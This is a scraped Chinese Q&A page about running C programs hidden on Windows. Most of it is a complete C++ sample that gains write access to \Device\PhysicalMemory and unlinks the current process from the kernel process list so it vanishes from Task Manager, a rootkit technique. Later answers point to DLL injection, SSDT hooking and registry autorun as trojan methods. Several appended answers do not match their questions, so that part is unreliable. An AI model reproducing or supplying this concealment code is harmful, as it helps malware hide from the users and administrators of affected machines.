C语言 关于隐藏进程
作者&投稿:端骅 (若有异议请与网页底部的电邮联系)
一般界面隐藏就是控制 台程序了, 另外还有进程隐藏 端口隐藏 启动隐藏 数据隐藏 等等 太多太多了
对于初学者来说,编写的都是控制台模式的C程序,也就是运行时会出现一个黑底的command窗口。
如果要运行时隐藏,就需要使用windows 程序,同时不要创建任何窗体,这样就不会有任何界面了。
使用VC创建隐藏运行程序方法如下:
1、 在创建工程的时候,不可以选择Win32 Console Application,而是要选择Win32 Application。
2、后续操作和Console程序类似,唯一区别为,Win32 App的主函数(入口函数)不是main,而是
Iint WINAPI WinMain(HINSTANCE,HINSTANCE,int,LPCSTR)
3、这种方式创建的程序,虽然不会有界面出现,但在任务管理器中还是有进程的。
这有一个网上搜到的例子:
// cctest.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#define WIN32_LEAN_AND_MEAN
#include <stdio.h>
#include <tchar.h>
#include <windows.h>
#include <accctrl.h>
#include <aclapi.h>
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)
typedef LONG NTSTATUS;
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
typedef struct _OBJECT_ATTRIBUTES
{
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
typedef NTSTATUS(CALLBACK* ZWOPENSECTION)(OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes);
typedef VOID(CALLBACK* RTLINITUNICODESTRING)(IN OUT PUNICODE_STRING DestinationString, IN PCWSTR SourceString);
static RTLINITUNICODESTRING RtlInitUnicodeString = NULL;
static ZWOPENSECTION ZwOpenSection = NULL;
static HMODULE g_hNtDLL = NULL;
static PVOID g_pMapPhysicalMemory = NULL;
static HANDLE g_hPhysicalMemory = NULL;
static OSVERSIONINFO g_ovVerInfo;
// BOOL g_bPaeEnabled = FALSE;
//////////////////////////////////////////////////////////////////////////
// Load ntdll.dll and retrieve function addresses
BOOL InitNtDll()
{
g_hNtDLL = LoadLibrary(_T("ntdll.dll"));
if (NULL == g_hNtDLL)
return FALSE;
RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress(g_hNtDLL, "RtlInitUnicodeString");
ZwOpenSection = (ZWOPENSECTION)GetProcAddress(g_hNtDLL, "ZwOpenSection");
if (!RtlInitUnicodeString || !ZwOpenSection)
return FALSE;
return TRUE;
}
//////////////////////////////////////////////////////////////////////////
// Free ntdll.dll
void CloseNtDll()
{
if (g_hNtDLL)
FreeLibrary(g_hNtDLL);
g_hNtDLL = NULL;
}
//////////////////////////////////////////////////////////////////////////
// Modifies ACL to allow write access to section
void SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
// Retrieve the security descriptor
PACL pDacl = NULL;
PSECURITY_DESCRIPTOR pSD = NULL;
DWORD dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pDacl, NULL, &pSD);
if (dwRes != ERROR_SUCCESS)
return;
// Setup the access struct, write access for current user
EXPLICIT_ACCESS ea;
RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions = SECTION_MAP_WRITE;
ea.grfAccessMode = GRANT_ACCESS;
ea.grfInheritance= NO_INHERITANCE;
ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
ea.Trustee.ptstrName = _T("CURRENT_USER");
// Create the new ACL
PACL pNewDacl = NULL;
dwRes = SetEntriesInAcl(1, &ea, pDacl, &pNewDacl);
if (ERROR_SUCCESS != dwRes)
{
if (pSD)
LocalFree(pSD);
if (pNewDacl)
LocalFree(pNewDacl);
return;
}
// Set the security descriptor
dwRes = SetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDacl, NULL);
if (ERROR_SUCCESS != dwRes)
{
if (pSD)
LocalFree(pSD);
if (pNewDacl)
LocalFree(pNewDacl);
return;
}
}
//////////////////////////////////////////////////////////////////////////
// Opens a handle and maps a view of the physical memory device
int OpenPhysicalMemory()
{
// Set the system PDB based on OS
ULONG PhyDirectory = 0;
if (g_ovVerInfo.dwMajorVersion == 5)
{
if (g_ovVerInfo.dwMinorVersion == 0) // 2K
{
PhyDirectory = 0x30000;
}
else if (g_ovVerInfo.dwMinorVersion == 1) // XP
{
// if (g_bPaeEnabled)
// PhyDirectory = 0x33f00;
// else
PhyDirectory = 0x39000;
}
else if (g_ovVerInfo.dwMinorVersion == 2) // 2K3
{
// if (g_bPaeEnabled)
// PhyDirectory = 0xad6000;
// else
PhyDirectory = 0x39000;
}
}
else if (g_ovVerInfo.dwMajorVersion == 4 && // NT
g_ovVerInfo.dwMinorVersion == 0 &&
g_ovVerInfo.dwPlatformId == 2)
{
PhyDirectory = 0x30000;
}
if (PhyDirectory == 0)
return -1;
UNICODE_STRING uszDevice;
RtlInitUnicodeString(&uszDevice, L"\\Device\\PhysicalMemory");
// Setup the object attributes
OBJECT_ATTRIBUTES oaAttr;
oaAttr.Length = sizeof(OBJECT_ATTRIBUTES);
oaAttr.RootDirectory = NULL;
oaAttr.ObjectName = &uszDevice;
oaAttr.Attributes = 0;
oaAttr.SecurityDescriptor = NULL;
oaAttr.SecurityQualityOfService = NULL;
// Open the physical memory device with write access
NTSTATUS lStatus;
lStatus = ZwOpenSection(&g_hPhysicalMemory, SECTION_MAP_READ | SECTION_MAP_WRITE, &oaAttr);
// If the attempt failed, try to modify the acl so we can open it
if (lStatus == STATUS_ACCESS_DENIED)
{
lStatus = ZwOpenSection(&g_hPhysicalMemory, READ_CONTROL | WRITE_DAC, &oaAttr);
SetPhyscialMemorySectionCanBeWrited(g_hPhysicalMemory);
CloseHandle(g_hPhysicalMemory);
lStatus = ZwOpenSection(&g_hPhysicalMemory, SECTION_MAP_READ | SECTION_MAP_WRITE, &oaAttr);
}
if (!NT_SUCCESS(lStatus))
return -2;
// Map a view of the memory
g_pMapPhysicalMemory = MapViewOfFile(g_hPhysicalMemory, FILE_MAP_READ | FILE_MAP_WRITE, 0, PhyDirectory, 0x1000);
if (!g_pMapPhysicalMemory)
return -3;
return 1;
}
//////////////////////////////////////////////////////////////////////////
// Close the handle and map to the physical memory device
void ClosePhysicalMemory()
{
if (g_pMapPhysicalMemory)
UnmapViewOfFile(g_pMapPhysicalMemory);
if (g_hPhysicalMemory)
CloseHandle(g_hPhysicalMemory);
g_pMapPhysicalMemory = NULL;
g_hPhysicalMemory = NULL;
}
//////////////////////////////////////////////////////////////////////////
// Maps a virtual address to a physical address
PVOID LinearToPhys(PULONG pBaseAddress, PVOID pVirtualAddr)
{
if (!pBaseAddress)
return 0;
ULONG ulVirtualAddr = (ULONG)pVirtualAddr, ulPhysicalAddr;
// Doesn't work on my 2K virtual machine if this code is enabled
// if (ulVirtualAddr >= 0x80000000 && ulVirtualAddr < 0xa0000000)
// {
// ulPhysicalAddr = ulVirtualAddr - 0x80000000;
// return (PVOID)ulPhysicalAddr;
// }
ULONG ulPageDir, ulPageTable;
ulPageDir = pBaseAddress[ulVirtualAddr >> 22];
if ((ulPageDir & 1) != 0)
{
ULONG tmp = ulPageDir & 0x00000080;
if (tmp != 0)
{
ulPhysicalAddr = ((ulPageDir & 0xFFC00000) + (ulVirtualAddr & 0x003FFFFF));
}
else
{
ulPageDir = (ULONG)MapViewOfFile(g_hPhysicalMemory, FILE_MAP_ALL_ACCESS, 0, ulPageDir & 0xFFFFF000, 0x1000);
ulPageTable = ((PULONG)ulPageDir)[(ulVirtualAddr & 0x003FF000) >> 12];
if ((ulPageTable & 1) != 0)
{
ulPhysicalAddr = (ulPageTable & 0xFFFFF000) + (ulVirtualAddr & 0x00000FFF);
UnmapViewOfFile((PVOID)ulPageDir);
}
else
{
return 0;
}
}
}
else
{
return 0;
}
return (PVOID)ulPhysicalAddr;
}
//////////////////////////////////////////////////////////////////////////
// Reads data from memory
ULONG GetData(PVOID pVirtualAddr)
{
ULONG ulPhysicalAddr = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, pVirtualAddr);
if (!ulPhysicalAddr)
return 0;
PULONG pTemp = (PULONG)MapViewOfFile(g_hPhysicalMemory, FILE_MAP_READ, 0, ulPhysicalAddr & 0xFFFFF000, 0x1000);
if (!pTemp)
return 0;
ULONG ulReturn = pTemp[(ulPhysicalAddr & 0xFFF) >> 2];
UnmapViewOfFile(pTemp);
return ulReturn;
}
//////////////////////////////////////////////////////////////////////////
// Writes data to memory
BOOL SetData(PVOID pVirtualAddr, ULONG ulData)
{
ULONG ulPhysicalAddr = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, pVirtualAddr);
if (!ulPhysicalAddr)
return FALSE;
PULONG pTemp = (PULONG)MapViewOfFile(g_hPhysicalMemory, FILE_MAP_WRITE, 0, ulPhysicalAddr & 0xFFFFF000, 0x1000);
if (!pTemp)
return FALSE;
pTemp[(ulPhysicalAddr & 0xFFF) >> 2] = ulData;
UnmapViewOfFile(pTemp);
return TRUE;
}
//////////////////////////////////////////////////////////////////////////
BOOL EnablePrivilege(TCHAR *pPrivName, BOOL bEnable/* = TRUE*/)
{
HANDLE hToken;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
return FALSE;
LUID uidName;
if (!LookupPrivilegeValue(NULL, pPrivName, &uidName))
{
CloseHandle(hToken);
return FALSE;
}
TOKEN_PRIVILEGES tpToken;
tpToken.PrivilegeCount = 1;
tpToken.Privileges[0].Luid = uidName;
tpToken.Privileges[0].Attributes = bEnable?SE_PRIVILEGE_ENABLED:SE_PRIVILEGE_REMOVED;
DWORD dwReturn;
BOOL bReturn = AdjustTokenPrivileges(hToken, FALSE, &tpToken, sizeof(TOKEN_PRIVILEGES), NULL, &dwReturn);
CloseHandle(hToken);
return bReturn;
}
//////////////////////////////////////////////////////////////////////////
BOOL HideCurrentProcess()
{
// Retrieve the OS version
g_ovVerInfo.dwOSVersionInfoSize = sizeof(g_ovVerInfo);
if (!GetVersionEx(&g_ovVerInfo))
{
return FALSE;
}
// Set the flink and blink offsets based on the OS
ULONG nFlinkOffset = 0;
ULONG nBlinkOffset = 0;
if (g_ovVerInfo.dwMajorVersion == 5)
{
if (g_ovVerInfo.dwMinorVersion == 0) // 2K
{
nFlinkOffset = 0xA0;
nBlinkOffset = 0xA4;
}
else if (g_ovVerInfo.dwMinorVersion == 1) // XP
{
nFlinkOffset = 0x88;
nBlinkOffset = 0x8C;
}
else if (g_ovVerInfo.dwMinorVersion == 2) // 2K3
{
nFlinkOffset = 0x8A;
nBlinkOffset = 0x8E;
}
}
else if (g_ovVerInfo.dwMajorVersion == 4 && // NT
g_ovVerInfo.dwMinorVersion == 0 &&
g_ovVerInfo.dwPlatformId == 2)
{
nFlinkOffset = 0x98;
nBlinkOffset = 0x9C;
}
if (nFlinkOffset == 0 || nBlinkOffset == 0)
{
return FALSE;
}
// Enable SeSecurityPrivilege
EnablePrivilege(SE_SECURITY_NAME, TRUE);
// Initialize ntdll.dll and open the physical memory
if (!InitNtDll())
{
return FALSE;
}
int nRet = OpenPhysicalMemory();
if (nRet != 1)
{
CloseNtDll();
return FALSE;
}
// Read the ETHREAD struct
ULONG ulThread = GetData((PVOID)0xFFDFF124);
if (!ulThread)
{
ClosePhysicalMemory();
CloseNtDll();
return FALSE;
}
// Read the EPROCESS struct
ULONG ulProcess = GetData((PVOID)(ulThread + 0x44));
if (!ulProcess)
{
ClosePhysicalMemory();
CloseNtDll();
return FALSE;
}
// Retrieve the flink and blink from the EPROCESS struct
ULONG ulFlink = GetData(PVOID(ulProcess + nFlinkOffset));
ULONG ulBlink = GetData(PVOID(ulProcess + nBlinkOffset));
if (!ulFlink || !ulBlink)
{
ClosePhysicalMemory();
CloseNtDll();
return FALSE;
}
// Hide from list
if (!SetData((PVOID)(ulFlink + 4), ulBlink) ||
!SetData((PVOID)(ulBlink), ulFlink))
{
ClosePhysicalMemory();
CloseNtDll();
return FALSE;
}
// Clean up
ClosePhysicalMemory();
CloseNtDll();
// Remove SeSecurityPrivilege
EnablePrivilege(SE_SECURITY_NAME, FALSE);
return TRUE;
}
int main(int argc, char **argv)
{
//
int a = 0;
HideCurrentProcess();
scanf("%d",&a);
printf("\n",a);
return 0; // Program successfully completed.
}
任务管理器的进程里不显示,这个不大可能
开机自动运行这个可以,加载到注册表的AutoRun表项就可以了
自动运行我不是有嘛
牧嵇胃乐: 一般界面隐藏就是控制 台程序了, 另外还有进程隐藏 端口隐藏 启动隐藏 数据隐藏 等等 太多太多了
惠水县13426158734: 怎样用C语言隐藏一个应用程序的窗口?? - ?
牧嵇胃乐: #include <stdio.h>#include <stdlib.h>#include <windows.h>#include <Winuser.h>#include <shellapi.h>#pragma comment(lib,"shell32.lib") main(){ ShellExecuteA(NULL,TEXT("open"), TEXT("wmplayer.exe"), TEXT("K:\\Loonie\\C\\P1\\1....
惠水县13426158734: C语言编写的程序,怎样隐藏运行,不弹CMD窗口 - ?
牧嵇胃乐: 1、调用system函数时用start的/b参数,system("start /b ping 10.10.10.11 -t"); 即可隐藏窗口. 2、system函数: 原型:int system(const char * command); 功能:执行 dos(windows系统) 或 shell(Linux/Unix系统) 命令,参数字符串command...
惠水县13426158734: C语言运行一个有界面的exe怎么隐藏运行 - ?
牧嵇胃乐: 1、头文件调用windows.h 2、使用并写出窗口代码, 3、或者新建一个MFC来创建窗口这里,代码默认都是输出在CMD,想要窗口必须自己通过代码创建或者使用MFC
惠水县13426158734: 如何让编写的C语言程序隐藏运行 - ?
牧嵇胃乐: 对于初学者来说,编写的都是控制台模式的C程序,也就是运行时会出现一个黑底的command窗口. 如果要运行时隐藏,就需要使用windows 程序,同时不要创建任何窗体,这样就不会有任何界面了. 使用VC创建隐藏运行程序方法如下:1、 ...
惠水县13426158734: 如何隐藏系统进程 - ?
牧嵇胃乐: 隐藏系统进程步骤:1、进入计算机,打开任意一个文件夹,然后再点击顶部菜单上的“查看”,或者按"ALT键"弹出工具栏.2、点击查看.3、勾选隐藏的项目,如果需要取消显示隐藏,取消勾选“隐藏的项目”即可.
惠水县13426158734: 怎样用代码实现一个程序运行时不会显示在任务管理器中的应用程序一栏?(用C语言)求大神啊...?
牧嵇胃乐: 有很多方法, 比较公开也比较成熟的两种方法是: 方法1. 把功能模块做成dll, 然后用CreateRemoteThread函数注入到其他进程执行 方法2. HOOK SSDT 隐藏你的进程 具体代码一搜一大把, 这是05年左右木马里比较流行的技术
惠水县13426158734: C++隐藏进程代码?
牧嵇胃乐: 最简单的方法:写在dll文件里面 然后cmd里面运行或者写到.bat文件: rundll32 foolu.dll fool (可以把这个命令框关掉)
惠水县13426158734: c语言如何让电脑一直按下shift键,并且让程序隐藏运行? - ?
牧嵇胃乐: 开始---控制面板---电源选项---休眠---在启用休眠前打勾.
惠水县13426158734: 在c语言中,我如果想隐藏一个运行窗口该怎样隐藏??
牧嵇胃乐: 这个就涉及到Windows编程了,和大学里学的那些编程貌似很不一样. Windows编程简单的来说以一个WinMain()开始,利用了Windows的消息机制和系统API,呵呵,好像简单几句话说不清楚,你最好利用向导生成一个Win32 Application,看看它的结构,实际编程的时候使用MFC AppWizard.
